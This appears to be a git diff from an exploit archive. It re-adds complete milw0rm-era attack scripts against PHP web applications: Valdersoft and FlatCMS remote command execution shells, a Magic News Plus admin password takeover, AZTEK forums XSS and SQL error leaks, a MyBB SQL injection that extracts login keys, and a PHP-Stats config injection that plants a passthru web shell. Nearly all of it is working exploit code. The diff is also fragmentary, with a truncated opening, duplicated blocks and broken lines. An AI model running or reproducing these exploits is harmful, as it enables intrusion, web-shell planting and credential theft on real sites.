+# tim@temp.atlnetworks.com:/usr/src/sys/compile/PLESK  i386
+# 
+# [cijfer@www.valdersoft.com /]$ 
+#
+## 2. explanation
+#
+# various files within 'include\templates\categories' contains unsanitized and undefined
+# variables which can allow remote file inclusion, leading to remote command execution.
+# this can be done by entering a remote url within the 'catalogDocumentRoot' variable.
+#
+## 3. the bug
+#
+# this is obvious _why_ it is dangerous.
+#
+#       ...
+#       include($catalogDocumentRoot.$catalogDir."include/modules/categories_path.php");
+#       ...
+#
+## 4. the php shell
+#
+# this exploit grabs data via regular expression strings. foreign php shell
+# scripts will not work with this exploit. use the following code along with
+# this exploit and put it in 'cmd.txt' or whatever you please:
+#
+#       
+#
+##
+#
+# $Id: cijfer-vscxpl.pl,v 0.2 2005/12/30 11:44:00 cijfer Exp cijfer $
+
+use Getopt::Std;
+use IO::Socket;
+use URI::Escape;
+
+getopts("h:d:");
+
+$host = $opt_h;
+$dirs = $opt_d;
+$shel = "http://site.com/cmd.txt";       # cmd shell url
+$cmdv = "cmd";                           # cmd variable (ex. passthru($_GET[cmd]);)
+$good = 0;
+
+if(!$host||!$dirs)
+{
+        print "cijfer-vscxpl.pl by cijfer\n";
+        print "usage: $0 -h cijfer.xxx -d /valdersoft\r\n";
+        print "usage: $0 -h  -d \r\n";
+        exit();
+}
+
+while()
+{
+        print "[cijfer@".$host." /]\$ ";
+        while()
+        {
+                $cmds=$_;
+                chomp($cmds);
+                last;
+        }
+
+        $string  = $dirs;
+        $string .= "/include/templates/categories/default.php?";
+        $string .= uri_escape($cmdv);
+        $string .= "=";
+        $string .= "%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B";
+        $string .= uri_escape($cmds).";echo";
+        $string .= "%3B%65%63%68%6F%20%5F%45%4E%44%5F;echo;";
+        $string .= "&catalogDocumentRoot=";
+        $string .= $shel;
+        $string .= "?";
+
+        $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
+
+        print $sock "GET $string HTTP/1.1\n";
+        print $sock "Host: $host\n";
+        print $sock "Accept: */*\n";
+        print $sock "Connection: close\n\n";
+
+        while($result = <$sock>)
+        {
+                if($result =~ /^_END_/)
+                {
+                        $good=0;
+                }
+
+                if($good==1)
+                {
+                        print $result;
+                }
+
+                if($result =~ /^_START_/)
+                {
+                        $good=1;
+                }
+        }
+}
+
+# milw0rm.com [2006-01-03]
diff --git a/platforms/php/webapps/1405.pl b/platforms/php/webapps/1405.pl
index b642e4986..82a0ca322 100755
--- a/platforms/php/webapps/1405.pl
+++ b/platforms/php/webapps/1405.pl
@@ -1,87 +1,87 @@
-#!/usr/bin/perl
-#
-# FlatCMS <=1.01 Remote Command Execution Exploit
-#
-# Copyright (c) 2005 cijfer 
-# All rights reserved.
-#
-# An input validation flaw exists within 'admin/file_editor.php'
-# of FlatCMS which can lead to remote command execution. 
-# Here is where the problem is (line 22 of 97):
-#
-#	...
-# [1]	if($save_file != "") {
-# [2]       	$f_content = stripslashes("$f_content");
-#        	if(!$f_w = fopen($save_file, w)) {
-#              		echo ("Cannot open file ("."$save_file".")
\n");
-#        	}
-# [3]       	if(!fwrite($f_w,$f_content)) {
-#                	echo ("File "."$save_file"." is not writable!
\n");
-#        	}
-#        	echo("Done saving file "."$save_file"."
\n");
-#	}
-#	...
-#
-# 1. If $save_file is not empty, use it.
-# 2. $f_content filters only slashes? that is all?
-# 3. write contents of $f_content into $save_file! :))
-#
-# kiitos ReZEN (www.xorcrew.net) :))
-#
-# $Id: cijfer-fcmsxpl.pl,v 0.1 2005/01/04 03:48:00 cijfer Exp cijfer $
-
-use LWP::UserAgent;
-use URI::Escape;
-use Getopt::Long;
-use Term::ANSIColor;
-
-$port = 80;
-$res  = GetOptions("host=s" => \$host, "dir=s" => \$dir, "port=i" => \$port, "tunnel=s" => \$tunnel);
-
-&usage unless $host and $dir;
-
-while()
-{
-	print color("green"), "cijfer\$ ", color("reset"); # colors :))!
-	chomp($command = );
-	exit unless $command;
-	&exploit($command);
-}
-
-sub usage
-{
-	print "FlatCMS <=1.01 Remote Command Execution Exploit\n";
-	print "Usage: $0 -hd [OPTION]...\n\n";
-	print "  -h --host\thostname or ip of target\n";
-	print "  -d --dir\tdirectory without ending slash\n";
-	print "  -p --port\tport number (default: 80)\n";
-	print "  -t --tunnel\tprovide an HTTP proxy (ex. 0.0.0.0:8080)\n\n";
-	exit;
-}
-
-sub exploit
-{
-	$cij=LWP::UserAgent->new() or die;
-	$cij->agent("Mozilla/5.0 [en] (X11; I; SunOS 5.6 sun4u)");
-	$cij->proxy("http", "http://".$tunnel."/") unless !$tunnel;
-
-	$string  = "echo%20_cijfer_%3B";
-	$string .= uri_escape(shift);
-	$string .= "%3Becho%20_cijfer_";
-
-	$execut  = "%3C%3F%24handle%3Dpopen%5C%28%24_GET%5Bcij%5D%2C%22r%22%29%3Bwhile%28%21feof";
-	$execut .= "%28%24handle%29%29%7B%24line%3Dfgets%28%24handle%29%3Bif%28strlen%28%24line%";
-	$execut .= "29%3E%3D1%29%7Becho%22%24line%22%3B%7D%7Dpclose%28%24handle%29%3B%3F%3E";
-
-	$path = "http://".$host.$dir."/admin/file_editor.php";
-	$out=$cij->get($path."?save_file=cijfer.php&f_content=".$execut);
-	$out=$cij->get("http://".$host.$dir."/admin/cijfer.php?cij=".$string);
-
-	if($out->is_success)
-	{
-		@cij=split("_cijfer_",$out->content);
-		print substr(@cij[1],1);
-	}
-}
-
-# milw0rm.com [2006-01-04]
+#!/usr/bin/perl
+#
+# FlatCMS <=1.01 Remote Command Execution Exploit
+#
+# Copyright (c) 2005 cijfer 
+# All rights reserved.
+#
+# An input validation flaw exists within 'admin/file_editor.php'
+# of FlatCMS which can lead to remote command execution. 
+# Here is where the problem is (line 22 of 97):
+#
+#	...
+# [1]	if($save_file != "") {
+# [2]       	$f_content = stripslashes("$f_content");
+#        	if(!$f_w = fopen($save_file, w)) {
+#              		echo ("Cannot open file ("."$save_file".")
\n");
+#        	}
+# [3]       	if(!fwrite($f_w,$f_content)) {
+#                	echo ("File "."$save_file"." is not writable!
\n");
+#        	}
+#        	echo("Done saving file "."$save_file"."
\n");
+#	}
+#	...
+#
+# 1. If $save_file is not empty, use it.
+# 2. $f_content filters only slashes? that is all?
+# 3. write contents of $f_content into $save_file! :))
+#
+# kiitos ReZEN (www.xorcrew.net) :))
+#
+# $Id: cijfer-fcmsxpl.pl,v 0.1 2005/01/04 03:48:00 cijfer Exp cijfer $
+
+use LWP::UserAgent;
+use URI::Escape;
+use Getopt::Long;
+use Term::ANSIColor;
+
+$port = 80;
+$res  = GetOptions("host=s" => \$host, "dir=s" => \$dir, "port=i" => \$port, "tunnel=s" => \$tunnel);
+
+&usage unless $host and $dir;
+
+while()
+{
+	print color("green"), "cijfer\$ ", color("reset"); # colors :))!
+	chomp($command = );
+	exit unless $command;
+	&exploit($command);
+}
+
+sub usage
+{
+	print "FlatCMS <=1.01 Remote Command Execution Exploit\n";
+	print "Usage: $0 -hd [OPTION]...\n\n";
+	print "  -h --host\thostname or ip of target\n";
+	print "  -d --dir\tdirectory without ending slash\n";
+	print "  -p --port\tport number (default: 80)\n";
+	print "  -t --tunnel\tprovide an HTTP proxy (ex. 0.0.0.0:8080)\n\n";
+	exit;
+}
+
+sub exploit
+{
+	$cij=LWP::UserAgent->new() or die;
+	$cij->agent("Mozilla/5.0 [en] (X11; I; SunOS 5.6 sun4u)");
+	$cij->proxy("http", "http://".$tunnel."/") unless !$tunnel;
+
+	$string  = "echo%20_cijfer_%3B";
+	$string .= uri_escape(shift);
+	$string .= "%3Becho%20_cijfer_";
+
+	$execut  = "%3C%3F%24handle%3Dpopen%5C%28%24_GET%5Bcij%5D%2C%22r%22%29%3Bwhile%28%21feof";
+	$execut .= "%28%24handle%29%29%7B%24line%3Dfgets%28%24handle%29%3Bif%28strlen%28%24line%";
+	$execut .= "29%3E%3D1%29%7Becho%22%24line%22%3B%7D%7Dpclose%28%24handle%29%3B%3F%3E";
+
+	$path = "http://".$host.$dir."/admin/file_editor.php";
+	$out=$cij->get($path."?save_file=cijfer.php&f_content=".$execut);
+	$out=$cij->get("http://".$host.$dir."/admin/cijfer.php?cij=".$string);
+
+	if($out->is_success)
+	{
+		@cij=split("_cijfer_",$out->content);
+		print substr(@cij[1],1);
+	}
+}
+
+# milw0rm.com [2006-01-04]
diff --git a/platforms/php/webapps/1410.pl b/platforms/php/webapps/1410.pl
index 6ae65d3ab..d60c7e402 100755
--- a/platforms/php/webapps/1410.pl
+++ b/platforms/php/webapps/1410.pl
@@ -1,105 +1,105 @@
-#!/usr/bin/perl
-#
-# Magic News Plus <=1.0.3 Admin Pass Change Exploit
-#
-# Copyright (c) 2006 cijfer 
-# All rights reserved.
-#
-# An input validation flaw exists within 'settings.php'
-# of Magic News Plus which can lead to the changing of
-# the administrative password. Here is where the problem 
-# is (line 108 of 426):
-#
-#       ...
-# [1]   elseif ($action == "change")
-#	       ...
-# [2]	   if ($passwd != $admin_password)
-#		       ...
-# [3]		   if ($new_passwd != $confirm_passwd)
-#       ...
-#
-# 1. &action=change
-# 2. &passwd=&admin_password=
-# 3. &new_passwd=&confirm_passwd=
-#
-# -> register_globals = on
-#
-# haha, sorry, no cmd execute this time.
-#
-# $Id: cijfer-mnxpl.pl,v 0.1 2006/01/07 19:24:00 cijfer Exp cijfer $
-
-use LWP::UserAgent;
-use Getopt::Long;
-use Term::ANSIColor;
-
-$port = 80;
-$new  = "cijfer";
-$res  = GetOptions("host=s" => \$host, "dir=s" => \$dir, "port=i" => \$port, "tunnel=s" => \$tunnel, "new=s" => \$new);
-
-&usage unless $host and $dir;
-&exploit;
-
-sub usage
-{
-	print "Magic News Plus <=1.0.3 Admin Pass Change Exploit\n";
-	print "Usage: $0 -hdn [OPTION]...\n\n";
-	print "  -h --host\thostname or ip of target\n";
-	print "  -d --dir\tdirectory without ending slash\n";
-	print "  -p --port\tport number (default: 80)\n";
-	print "  -t --tunnel\tprovide an HTTP proxy (ex. 0.0.0.0:8080)\n";
-	print "  -n --new\tnew admin password you want (default: cijfer)\n\n";
-	exit;
-}
-
-sub try
-{
-	$cij=LWP::UserAgent->new() or die;
-	$cij->agent("Mozilla/5.0 [en] (X11; I; SunOS 5.6 sun4u)");
-	$cij->proxy("http", "http://".$tunnel."/") unless !$tunnel;
-
-	$path="http://".$host.$dir."/";
-	$out=$cij->get($path."index.php?login=admin&password=".$new."&action=login");
-
-	if($out->is_success)
-	{
-		if($out->content =~ /Wrong/)
-		{
-			print color("red"), ":(\n", color("reset");
-			exit;
-		}
-	}
-}
-
-sub exploit
-{
-	$cij=LWP::UserAgent->new() or die;
-	$cij->agent("Mozilla/5.0 [en] (X11; I; SunOS 5.6 sun4u)");
-	$cij->proxy("http", "http://".$tunnel."/") unless !$tunnel;
-
-	$string  = "settings.php?action=change";
-	$string .= "&passwd=cijfer";
-	$string .= "&admin_password=cijfer";
-	$string .= "&new_passwd=";
-	$string .= $new;
-	$string .= "&confirm_passwd=";
-	$string .= $new;
-
-	$path="http://".$host.$dir."/";
-	$out=$cij->get($path.$string);
-
-	if($out->is_success)
-	{
-		print "trying username admin and password ".$new."...\n";
-		&try;
-		print "user: admin, pass: ".$new;
-		print color("green"), " :)) ", color("reset");
-		print "-- http://".$host.$dir."\n";
-	}
-	else
-	{
-		print color("red"), ":(\n", color("reset");
-		exit;
-	}
-}
-
-# milw0rm.com [2006-01-09]
+#!/usr/bin/perl
+#
+# Magic News Plus <=1.0.3 Admin Pass Change Exploit
+#
+# Copyright (c) 2006 cijfer 
+# All rights reserved.
+#
+# An input validation flaw exists within 'settings.php'
+# of Magic News Plus which can lead to the changing of
+# the administrative password. Here is where the problem 
+# is (line 108 of 426):
+#
+#       ...
+# [1]   elseif ($action == "change")
+#	       ...
+# [2]	   if ($passwd != $admin_password)
+#		       ...
+# [3]		   if ($new_passwd != $confirm_passwd)
+#       ...
+#
+# 1. &action=change
+# 2. &passwd=&admin_password=
+# 3. &new_passwd=&confirm_passwd=
+#
+# -> register_globals = on
+#
+# haha, sorry, no cmd execute this time.
+#
+# $Id: cijfer-mnxpl.pl,v 0.1 2006/01/07 19:24:00 cijfer Exp cijfer $
+
+use LWP::UserAgent;
+use Getopt::Long;
+use Term::ANSIColor;
+
+$port = 80;
+$new  = "cijfer";
+$res  = GetOptions("host=s" => \$host, "dir=s" => \$dir, "port=i" => \$port, "tunnel=s" => \$tunnel, "new=s" => \$new);
+
+&usage unless $host and $dir;
+&exploit;
+
+sub usage
+{
+	print "Magic News Plus <=1.0.3 Admin Pass Change Exploit\n";
+	print "Usage: $0 -hdn [OPTION]...\n\n";
+	print "  -h --host\thostname or ip of target\n";
+	print "  -d --dir\tdirectory without ending slash\n";
+	print "  -p --port\tport number (default: 80)\n";
+	print "  -t --tunnel\tprovide an HTTP proxy (ex. 0.0.0.0:8080)\n";
+	print "  -n --new\tnew admin password you want (default: cijfer)\n\n";
+	exit;
+}
+
+sub try
+{
+	$cij=LWP::UserAgent->new() or die;
+	$cij->agent("Mozilla/5.0 [en] (X11; I; SunOS 5.6 sun4u)");
+	$cij->proxy("http", "http://".$tunnel."/") unless !$tunnel;
+
+	$path="http://".$host.$dir."/";
+	$out=$cij->get($path."index.php?login=admin&password=".$new."&action=login");
+
+	if($out->is_success)
+	{
+		if($out->content =~ /Wrong/)
+		{
+			print color("red"), ":(\n", color("reset");
+			exit;
+		}
+	}
+}
+
+sub exploit
+{
+	$cij=LWP::UserAgent->new() or die;
+	$cij->agent("Mozilla/5.0 [en] (X11; I; SunOS 5.6 sun4u)");
+	$cij->proxy("http", "http://".$tunnel."/") unless !$tunnel;
+
+	$string  = "settings.php?action=change";
+	$string .= "&passwd=cijfer";
+	$string .= "&admin_password=cijfer";
+	$string .= "&new_passwd=";
+	$string .= $new;
+	$string .= "&confirm_passwd=";
+	$string .= $new;
+
+	$path="http://".$host.$dir."/";
+	$out=$cij->get($path.$string);
+
+	if($out->is_success)
+	{
+		print "trying username admin and password ".$new."...\n";
+		&try;
+		print "user: admin, pass: ".$new;
+		print color("green"), " :)) ", color("reset");
+		print "-- http://".$host.$dir."\n";
+	}
+	else
+	{
+		print color("red"), ":(\n", color("reset");
+		exit;
+	}
+}
+
+# milw0rm.com [2006-01-09]
diff --git a/platforms/php/webapps/14415.html b/platforms/php/webapps/14415.html
index 8bc5e7432..f57197ebf 100755
--- a/platforms/php/webapps/14415.html
+++ b/platforms/php/webapps/14415.html
@@ -37,7 +37,7 @@ FILE NAME:

 
   (ex. shell.php)
FILE CONTENTS:
 
 
- 
+'">
-	- Valid.
-	- Click on "Citer" to execute the script.
-
-	You can also do it with the edit button (after loging in).
-
-2-
-	Do the following request : http://SOME_HOST/forum/index.php?msg=*/*
-	It will dump a MySQL error message which can dump login:pw infos.
-
-3-
-	- Register with :
-	login : 6b 66 73 6a 64 61 20 54 50 68 70 45 72 72 6f 72 45 78 63 65
-	70 74 69 6f 6e 0d 0a 44 65 73 63 72 69 70 74 69 6f 6e 0d 0a 5b 57 61
-	72 6e 69 6e 67 5d 20 6d 79 73 71 6c 5f 63 6f 6e 6e 65 63 74 28 29 20
-	5b 3c 61 20 68 72 65 66 3d 27 66 75
-        [...a huge login name...]
-	6e 63 74 69 6f 6e 2e 6d 79 73 71 6c 2d 63 6f 6e 6e 65 63 74 27 3e 66
-	75 6e 63 74 69 6f 6e 2e 6d 79 73 71 6c 2d 63 6f 6e
-	passwd:blabla
-	email:blabla@gmail.com
-	- Valid.
-
-	This form is not validated at all, so it can cause a MySQL error like :
-
-	Mysql error in file 
-	/home/httpd/vhosts/www.**********.com/web/forum/index/actions.php in
-	function subscribe at line 222
-
-	Mysql query error :
-	INSERT INTO atk_users (login,owner,passwd,email,show_email,alert_mp,subscribe)
-		VALUES ('6b 66 73 6a 64 61 20 54 50 68 
-	[...]','admin','atHax4CLQE42Q','blabla@gmail.com','1','1','1141202540')
-
-	Please note this error and contact your administrator.
-
---
-PoC by lorenzo [GHT], http://ght.c.la/
-
-# milw0rm.com [2006-03-02]
+/*==========================================*/
+// AZTEK forums 4.0 multiple vulnerabilities (PoC)
+// Product: AZTEK forums
+// URL: http://www.forum-aztek.com/
+// RISK: high
+/*==========================================*/
+
+[PoC]
+
+1- XSS
+	- Post a message including the following line: </textarea>'">
+	- Valid.
+	- Click on "Citer" to execute the script.
+
+	You can also do it with the edit button (after loging in).
+
+2-
+	Do the following request : http://SOME_HOST/forum/index.php?msg=*/*
+	It will dump a MySQL error message which can dump login:pw infos.
+
+3-
+	- Register with :
+	login : 6b 66 73 6a 64 61 20 54 50 68 70 45 72 72 6f 72 45 78 63 65
+	70 74 69 6f 6e 0d 0a 44 65 73 63 72 69 70 74 69 6f 6e 0d 0a 5b 57 61
+	72 6e 69 6e 67 5d 20 6d 79 73 71 6c 5f 63 6f 6e 6e 65 63 74 28 29 20
+	5b 3c 61 20 68 72 65 66 3d 27 66 75
+        [...a huge login name...]
+	6e 63 74 69 6f 6e 2e 6d 79 73 71 6c 2d 63 6f 6e 6e 65 63 74 27 3e 66
+	75 6e 63 74 69 6f 6e 2e 6d 79 73 71 6c 2d 63 6f 6e
+	passwd:blabla
+	email:blabla@gmail.com
+	- Valid.
+
+	This form is not validated at all, so it can cause a MySQL error like :
+
+	Mysql error in file 
+	/home/httpd/vhosts/www.**********.com/web/forum/index/actions.php in
+	function subscribe at line 222
+
+	Mysql query error :
+	INSERT INTO atk_users (login,owner,passwd,email,show_email,alert_mp,subscribe)
+		VALUES ('6b 66 73 6a 64 61 20 54 50 68 
+	[...]','admin','atHax4CLQE42Q','blabla@gmail.com','1','1','1141202540')
+
+	Please note this error and contact your administrator.
+
+--
+PoC by lorenzo [GHT], http://ght.c.la/
+
+# milw0rm.com [2006-03-02]
diff --git a/platforms/php/webapps/1548.pl b/platforms/php/webapps/1548.pl
index 0b7538334..31daf6755 100755
--- a/platforms/php/webapps/1548.pl
+++ b/platforms/php/webapps/1548.pl
@@ -1,56 +1,56 @@
-#!/usr/bin/perl -w
-
-# MyBB <= 1.04 (misc.php COMMA) Remote SQL Injection Exploit 2 , Perl C0d3
-#
-# Milw0rm ID :-
-#			http://www.milw0rm.com/auth.php?id=1539
-# D3vil-0x1 | Devil-00 < BlackHat > :)
-#
-# DONT FORGET TO DO YOUR CONFIG !!
-# DONT FORGET TO DO YOUR CONFIG !!
-# DONT FORGET TO DO YOUR CONFIG !!
-use IO::Socket;
-
-##-- Start --#
-
-$host 	= "127.0.0.1";
-$path		= "/mybb3/";
-$userid	= 1;
-$mycookie 	= "mybbuser=1_xommhw5h9kZZGSFUppacVfacykK1gnd84PLehjlhTGC1ZiQkXr;";
-
-##-- _END_ --##
-#	$host		:-
-#				The Host Name Without http:// | exm. www.vic.com
-#
-#	$path		:-
-#				MyBB Dir On Server | exm. /mybb/
-#
-#	$userid	:-
-#				The ID Of The User U Wanna To Get His Loginkey
-#
-#	$cookie	:-
-#				You Must Register Username And Get YourCookies ( mybb_user ) Then But it Like This
-#	
-#				$cookie 	= "mybbuser=[YourID]_[YourLoginkey];";
-$sock = IO::Socket::INET->new (
-										PeerAddr => "$host",
-										PeerPort	=> "80",
-										Proto		=> "tcp"
-										) or die("[!] Connect To Server Was Filed");
-##-- DONT TRY TO EDIT ME --##										
-$evilcookie = "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=$userid/*;";
-##-- DONT TRY TO EDIT ME --##						
-$evildata  = "GET ".$path."misc.php?action=buddypopup HTTP/1.1\n";
-$evildata .= "Host: $host \n";
-$evildata .= "Accept: */* \n";
-$evildata .= "Keep-Alive: 300\n";
-$evildata .= "Connection: keep-alive \n";
-$evildata .= "Cookie: ".$mycookie." ".$evilcookie."\n\n";
-
-print $sock $evildata;
-
-while($ans = <$sock>){
-	$ans =~ m/(.*?)<\/a><\/span><\/td>/ && print "[+] Loginkey is :- ".$1."\n";
-}
-
-# milw0rm.com [2006-03-03]
+#!/usr/bin/perl -w
+
+# MyBB <= 1.04 (misc.php COMMA) Remote SQL Injection Exploit 2 , Perl C0d3
+#
+# Milw0rm ID :-
+#			http://www.milw0rm.com/auth.php?id=1539
+# D3vil-0x1 | Devil-00 < BlackHat > :)
+#
+# DONT FORGET TO DO YOUR CONFIG !!
+# DONT FORGET TO DO YOUR CONFIG !!
+# DONT FORGET TO DO YOUR CONFIG !!
+use IO::Socket;
+
+##-- Start --#
+
+$host 	= "127.0.0.1";
+$path		= "/mybb3/";
+$userid	= 1;
+$mycookie 	= "mybbuser=1_xommhw5h9kZZGSFUppacVfacykK1gnd84PLehjlhTGC1ZiQkXr;";
+
+##-- _END_ --##
+#	$host		:-
+#				The Host Name Without http:// | exm. www.vic.com
+#
+#	$path		:-
+#				MyBB Dir On Server | exm. /mybb/
+#
+#	$userid	:-
+#				The ID Of The User U Wanna To Get His Loginkey
+#
+#	$cookie	:-
+#				You Must Register Username And Get YourCookies ( mybb_user ) Then But it Like This
+#	
+#				$cookie 	= "mybbuser=[YourID]_[YourLoginkey];";
+$sock = IO::Socket::INET->new (
+										PeerAddr => "$host",
+										PeerPort	=> "80",
+										Proto		=> "tcp"
+										) or die("[!] Connect To Server Was Filed");
+##-- DONT TRY TO EDIT ME --##										
+$evilcookie = "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=$userid/*;";
+##-- DONT TRY TO EDIT ME --##						
+$evildata  = "GET ".$path."misc.php?action=buddypopup HTTP/1.1\n";
+$evildata .= "Host: $host \n";
+$evildata .= "Accept: */* \n";
+$evildata .= "Keep-Alive: 300\n";
+$evildata .= "Connection: keep-alive \n";
+$evildata .= "Cookie: ".$mycookie." ".$evilcookie."\n\n";
+
+print $sock $evildata;
+
+while($ans = <$sock>){
+	$ans =~ m/(.*?)<\/a><\/span><\/td>/ && print "[+] Loginkey is :- ".$1."\n";
+}
+
+# milw0rm.com [2006-03-03]
diff --git a/platforms/php/webapps/1549.php b/platforms/php/webapps/1549.php
index 74809784a..4091acfa8 100755
--- a/platforms/php/webapps/1549.php
+++ b/platforms/php/webapps/1549.php
@@ -1,251 +1,251 @@
- works regardless of magic_quotes_gpc settings...                         #
-#  usage: launch from Apache, fill in requested fields, then go!               #
-#                                                                              #
-#  Sun-Tzu:"Of old, the rise of the Yin dynasty was due to I Chih who had      #
-#  served under the Hsia.  Likewise, the rise of the Chou dynasty was due to   #
-#  Lu Ya who had served under the Yin."                                        #
-
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-ob_implicit_flush (1);
-
-echo'***** PHP-Stats <= 0.1.9.1 remote commands execution****
-
-

-***** PHP-Stats <= 0.1.9.1 remote commands execution**** 
a
-script  by  rgod  at    
-http://retrogod.altervista.org

-

-
    
 * target    (ex:www.sitename.com)
-
 
  * path (ex:
-/stats/ or just / ) 
           * specify a command ("cat config.php" to see database username  &
-password...)

-specify  a  port other than  80 (default value) 
send  exploit through an HTTP proxy  (ip:port)
-
 
 
 
';
-
-function show($headeri)
-{
-  $ii=0;$ji=0;$ki=0;$ci=0;
-  echo '';
-  while ($ii <= strlen($headeri)-1){
-    $datai=dechex(ord($headeri[$ii]));
-    if ($ji==16) {
-      $ji=0;
-      $ci++;
-      echo "";
-      for ($li=0; $li<=15; $li++) {
-        echo "";
-		}
-      $ki=$ki+16;
-      echo "";
-    }
-    if (strlen($datai)==1) {
-      echo "";
-    }
-    else {
-      echo " ";
-    }
-    $ii++;$ji++;
-  }
-  for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {
-    echo "";
-  }
-  for ($li=$ci*16; $li<=strlen($headeri); $li++) {
-    echo "";
-  }
-  echo "
  ".htmlentities($headeri[$li+$ki])."
0".htmlentities($datai)."".htmlentities($datai)."  ".htmlentities($headeri[$li])."
";
-}
-
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-
-function sendpacket() //2x speed
-{
-  global $proxy, $host, $port, $packet, $html, $proxy_regex;
-  $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
-  if ($socket < 0) {
-    echo "socket_create() failed: reason: " . socket_strerror($socket) . "
";
-  }
-  else {
-    $c = preg_match($proxy_regex,$proxy);
-    if (!$c) {echo 'Not a valid proxy...';
-    die;
-    }
-  echo "OK.
";
-  echo "Attempting to connect to ".$host." on port ".$port."...
";
-  if ($proxy=='') {
-    $result = socket_connect($socket, $host, $port);
-  }
-  else {
-    $parts =explode(':',$proxy);
-    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
';
-    $result = socket_connect($socket, $parts[0],$parts[1]);
-  }
-  if ($result < 0) {
-    echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "

";
-  }
-  else {
-    echo "OK.

";
-    $html= '';
-    socket_write($socket, $packet, strlen($packet));
-    echo "Reading response:
";
-    while ($out= socket_read($socket, 2048)) {$html.=$out;}
-    echo nl2br(htmlentities($html));
-    echo "Closing socket...";
-    socket_close($socket);
-  }
-  }
-}
-
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.htmlentities($host); die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid prozy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
';
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);echo nl2br(htmlentities($html));
-}
-
-if ( get_magic_quotes_gpc() ) {
-   function stripslashes_deep($value) {
-       $value = is_array($value) ? array_map('stripslashes_deep', $value) : stripslashes($value);
-       return $value;
-   }
-   $_POST = stripslashes_deep($_POST);
-}
-
-$host=$_POST[host];$port=$_POST[port];$path=$_POST[path];
-$cmd=$_POST[cmd];$cmd=urlencode($cmd);$proxy=$_POST[proxy];
-echo "";
-
-if (($host<>'') and ($path<>'') and ($cmd<>''))
-{
-    $port=intval(trim($port));
-    if ($port=='') {$port=80;}
-    if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-    if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-    $host=str_replace("\r","",$host);$host=str_replace("\n","",$host);
-    $path=str_replace("\r","",$path);$path=str_replace("\n","",$path);
-
-    $SHELL =';if (isset($_GET[cmd])){if (get_magic_quotes_gpc()){';
-    $SHELL.='$_GET[cmd] = stripslashes($_GET[cmd]);';
-    $SHELL.='}passthru($_GET[cmd]);}//';
-    #exploit... overwrite option[] array
-    #set a new admin password at run-time :)
-    #*****************************************
-    $data ="option=";
-    $data.="&option[admin_pass]=suntzu";
-    #****************************************
-    $data.="&option_new[callviaimg]=1";
-    $data.="&option_new[php_stats_safe]=0";
-    $data.="&option_new[out_compress]=1";
-    $data.="&option_new[persistent_conn]=0";
-    $data.="&option_new[autorefresh]=3";
-    $data.="&option_new[show_server_details]=1";
-    $data.="&option_new[show_average_user]=0";
-    $data.="&option_new[short_url]=1";
-    $data.="&option_new[lock_not_valid_url]=0";
-    $data.="&option_new[ext_whois]=";
-    $data.="&option_new[online_timeout]=5";
-    $data.="&option_new[page_title]=";
-    $data.="&option_new[online_timeout]=5";
-    $data.="&option_new[page_title]=1";
-    $data.="&option_new[log_host]=0";
-    $data.="&option_new[clear_cache]=0";
-    $data.="&option_new[full_recn]=0";
-    $data.="&option_new[logerrors]=1";
-    $data.="&option_new[check_new_version]=1";
-    $data.="&option_new[www_trunc]=0";
-    $data.="&option_new[accept_ssi]=1";
-    # inject some code in compatibility_mode argument...
-    # you can use all values, they should be numeric
-    # but they are not checked
-    # and not delimited by quotes in config.php
-    # so it works regardless of magic_quotes_gpc ...
-    $data.="&option_new[compatibility_mode]=0".$SHELL;
-    $data.="&option_new[ip-zone]=0";
-    $data.="&option_new[down_mode]=0";
-    $data.="&option_new[check_links]=1";
-    $data.="&mode=modify";
-    $packet ="POST ".$p."admin.php?action=modify_config HTTP/1.1\r\n";
-    $packet.="User-Agent: John Constantine\r\n";
-    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-    #******** the magic cookie ****************
-    $packet.="Cookie: php_stats_cache=1; pass_cookie=".md5("suntzu").";\r\n";
-    #******************************************
-    $packet.="Host: ".$host."\r\n";
-    $packet.="Content-Length: ".strlen($data)."\r\n";
-    $packet.="Connection: Close\r\n\r\n";
-    $packet.=$data;
-    show($packet);
-    sendpacketii($packet);
-
-    $packet ="GET ".$p."config.php?cmd=".$cmd." HTTP/1.1\r\n";
-    $packet.="User-Agent: URLBlaze\r\n";
-    $packet.="Host: ".$host."\r\n";
